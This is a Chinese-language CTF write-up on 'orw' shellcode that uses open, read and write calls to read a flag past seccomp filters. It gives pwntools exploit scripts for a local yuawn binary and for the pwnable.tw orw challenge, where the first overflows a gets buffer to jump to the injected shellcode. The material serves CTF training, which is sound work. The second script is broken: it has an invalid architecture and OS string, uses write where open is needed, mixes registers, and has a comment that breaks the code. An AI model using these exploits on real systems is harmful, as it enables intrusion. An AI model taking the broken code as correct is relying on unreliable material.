設定環境:
1
| context(arch='i386',os='linux')
|
暫存器 Review
What is orw
利用 open,read and write 這三個 systemcall 去取得 flag
What is seccomp?
分析程式的 seccomp 狀態,查看哪一些 system call 被禁用
download :
1
2
| sudo apt install gcc ruby-dev
gem install seccomp-tools
|
起手式
seccomp-tools dump <filename>
demo yuawn orw (64 bits)
Recon
file:
r2:
發現 sc 的部分是全域變數,然後他有給你位置,並且下面有一個 I give you bof 是用 gets 去讀,並且大小為 0x10+0x8
seccomp:
exploit
1
2
3
4
5
6
7
8
9
10
| from pwn import *
context(arch='amd64',os='linux')
r=process('./orw')
#利用('rax','rsp')去寫入
r.sendline(asm(shellcraft.open('/flag')+shellcraft.read('rax','rsp',0x100)+shellcraft.write(1,'rsp',0x100)))
#利用(1,'rsp',0x100)去寫入
r.sendlineafter(b':)', b'a'*0x18 + p64(0x6010a0))
r.interactive()
|
demo pwnable orw (32 bits)
labs: https://pwnable.tw/static/chall/orw
Recon
file:
checksec:
exec:
seccomp:
disas main:
exploit
1
2
3
4
5
6
7
8
9
10
11
12
|
from pwn import *
context(arch='i384',os='linx')
r=remote('chall.pwnable.tw',10001)
#讀利用(eax,esp,大小)
sc=asm(shellcraft.write('/home/orw/flag')+shellcraft.read('eax','ebp',0x100)+shellcraft.write(1,'ebp',0x100)) 寫利用(1,'esp',大小)
r.sendlineafter(':',sc)
r.interactive()
|
References:
https://kazma.tw/2023/12/10/Yuawn-Pwn1-orw-Writeup/
https://kazma.tw/2024/02/07/Pwnable-tw-orw-Writeup/
https://www.youtube.com/watch?v=U8N6aE-Nq-Q
